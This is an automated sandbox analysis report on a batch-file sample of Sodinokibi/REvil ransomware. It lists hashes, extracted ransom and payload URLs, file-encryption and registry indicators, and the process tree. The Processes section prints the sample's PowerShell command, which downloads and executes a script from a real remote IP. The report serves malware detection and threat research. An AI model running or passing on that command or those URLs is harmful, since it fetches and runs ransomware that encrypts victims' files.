Analysis
- max time kernel: 148s
- max time network: 150s
- platform: windows10_x64
- resource: win10v200722
- submitted: 03-09-2020 19:10
Static task: static1
Behavioral task: behavioral1
  Sample: 01619b049472811b76565ddd589bc9eb.bat
  Resource: win7v200722
Behavioral task: behavioral2
  Sample: 01619b049472811b76565ddd589bc9eb.bat
  Resource: win10v200722
General
- Target: 01619b049472811b76565ddd589bc9eb.bat
- Size: 221B
- MD5: 3ab48b49f0f231c470e42900d1a7e59f
- SHA1: a25a30cfa56bd61d0484e2a37fd86fb365edf99a
- SHA256: d58ef2af3b2f9387c21e0e0b5b81594a995dc4a09e8befa0f0d95700bc9a342c
- SHA512: f6a7e33125726389dd01e7cfcce2286050cc48d56b465c719f8d5bfe6facef0fbf83ad47111c52ecd3d67f090e394dfaa842013f71b9b7d81f2c0e8c4e9ab4e5
Malware Config
- Extracted: http://185.103.242.78/pastes/01619b049472811b76565ddd589bc9eb
- Extracted: C:\m6h3sco-readme.txt
  Family: sodinokibi
  URLs:
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/DFAA79F45525AB35
    http://decryptor.cc/DFAA79F45525AB35
Signatures
- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Blacklisted process makes network request (112 IoCs)
  Processes: powershell.exe (PID 392)
  Network flows attributed to PID 392 powershell.exe: 13, 26, 27, 28, 29, 31, 33, 35, 37, 39, 41, 43, 45, 47, 48, 50, 52, 54, 56, 58, 60, 62, 64, 66, 68, 70, 72, 74, 76, 78, 80, 82, 84, 86, 88, 90, 92, 94, 96, 98, 100, 103, 105, 107, 109, 111, 113, 115, 117, 119, 121, 123, 125, 127, 129, 131, 133, 135, 137, 139, 141, 143, 145, 147
- Modifies extensions of user files (4 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes: powershell.exe
  description | ioc | process
  File renamed | C:\Users\Admin\Pictures\BackupStop.png => \??\c:\users\admin\pictures\BackupStop.png.m6h3sco | powershell.exe
  File renamed | C:\Users\Admin\Pictures\DenyCheckpoint.tif => \??\c:\users\admin\pictures\DenyCheckpoint.tif.m6h3sco | powershell.exe
  File renamed | C:\Users\Admin\Pictures\ReceiveGet.tif => \??\c:\users\admin\pictures\ReceiveGet.tif.m6h3sco | powershell.exe
  File renamed | C:\Users\Admin\Pictures\UseUnpublish.tif => \??\c:\users\admin\pictures\UseUnpublish.tif.m6h3sco | powershell.exe
- Enumerates connected drives (3 TTPs)
- Modifies service (2 TTPs, 5 IoCs)
  Processes: vssvc.exe
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
- Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  Processes: powershell.exe
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\b19rlft138vf5.bmp" | powershell.exe
- Drops file in Program Files directory (33 IoCs)
  Processes: powershell.exe
  description | ioc | process
  File created | \??\c:\program files (x86)\m6h3sco-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\ResizeUnregister.wmx | powershell.exe
  File opened for modification | \??\c:\program files\RestartResize.jpeg | powershell.exe
  File opened for modification | \??\c:\program files\SubmitSend.raw | powershell.exe
  File created | \??\c:\program files\m6h3sco-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\OptimizeRequest.wvx | powershell.exe
  File opened for modification | \??\c:\program files\SelectPublish.mpp | powershell.exe
  File opened for modification | \??\c:\program files\UndoApprove.rtf | powershell.exe
  File opened for modification | \??\c:\program files\InitializeMeasure.wav | powershell.exe
  File opened for modification | \??\c:\program files\RestartConvert.dot | powershell.exe
  File opened for modification | \??\c:\program files\SendRead.pptx | powershell.exe
  File opened for modification | \??\c:\program files\UseCopy.emz | powershell.exe
  File opened for modification | \??\c:\program files\ResetUpdate.wma | powershell.exe
  File opened for modification | \??\c:\program files\ResizeEnter.pcx | powershell.exe
  File opened for modification | \??\c:\program files\ClearFind.mov | powershell.exe
  File opened for modification | \??\c:\program files\ConvertSplit.sql | powershell.exe
  File opened for modification | \??\c:\program files\ExpandTrace.mov | powershell.exe
  File opened for modification | \??\c:\program files\NewCheckpoint.vssx | powershell.exe
  File opened for modification | \??\c:\program files\OptimizeUpdate.edrwx | powershell.exe
  File opened for modification | \??\c:\program files\WatchConnect.emf | powershell.exe
  File opened for modification | \??\c:\program files\CloseMerge.avi | powershell.exe
  File opened for modification | \??\c:\program files\DebugJoin.css | powershell.exe
  File opened for modification | \??\c:\program files\FindTrace.rmi | powershell.exe
  File opened for modification | \??\c:\program files\ReceiveStart.vdw | powershell.exe
  File opened for modification | \??\c:\program files\WaitSwitch.png | powershell.exe
  File opened for modification | \??\c:\program files\SuspendMerge.midi | powershell.exe
  File opened for modification | \??\c:\program files\EnterOut.xml | powershell.exe
  File opened for modification | \??\c:\program files\ImportTest.ps1xml | powershell.exe
  File opened for modification | \??\c:\program files\InstallUpdate.wps | powershell.exe
  File opened for modification | \??\c:\program files\LimitComplete.xml | powershell.exe
  File opened for modification | \??\c:\program files\RequestEnable.js | powershell.exe
  File opened for modification | \??\c:\program files\InitializeRepair.DVR | powershell.exe
  File opened for modification | \??\c:\program files\SendUpdate.wmf | powershell.exe
- Drops file in Windows directory (1 IoCs)
  Processes: svchost.exe
  description | ioc | process
  File opened for modification | C:\Windows\ServiceProfiles\LocalService\winhttp\cachev3.dat | svchost.exe
- Modifies data under HKEY_USERS (5 IoCs)
  Processes: svchost.exe
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7 | svchost.exe
  Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionReason = "1" | svchost.exe
  Set value (data) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionTime = 782752393682d601 | svchost.exe
  Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecision = "0" | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | svchost.exe
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes: powershell.exe
  pid | process
  392 | powershell.exe
  392 | powershell.exe
  392 | powershell.exe
  392 | powershell.exe
  392 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (8 IoCs)
  Processes: svchost.exe, powershell.exe, vssvc.exe
  description | pid | process
  Token: SeShutdownPrivilege | 2236 | svchost.exe
  Token: SeCreatePagefilePrivilege | 2236 | svchost.exe
  Token: SeDebugPrivilege | 392 | powershell.exe
  Token: SeDebugPrivilege | 392 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 392 | powershell.exe
  Token: SeBackupPrivilege | 3748 | vssvc.exe
  Token: SeRestorePrivilege | 3748 | vssvc.exe
  Token: SeAuditPrivilege | 3748 | vssvc.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes: cmd.exe
  description | pid | process | target process
  PID 3952 wrote to memory of 392 | 3952 | cmd.exe | powershell.exe
  PID 3952 wrote to memory of 392 | 3952 | cmd.exe | powershell.exe
  PID 3952 wrote to memory of 392 | 3952 | cmd.exe | powershell.exe
Processes
- C:\Windows\system32\cmd.exe (PID 3952)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\01619b049472811b76565ddd589bc9eb.bat"
  Signatures:
  - Suspicious use of WriteProcessMemory
  Child process:
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 392)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/01619b049472811b76565ddd589bc9eb');Invoke-BSCFPHAYQBPUGG;Start-Sleep -s 10000"
    Signatures:
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\svchost.exe (PID 2236)
  Command line: C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
  Signatures:
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\vssvc.exe (PID 3748)
  Command line: C:\Windows\system32\vssvc.exe
  Signatures:
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken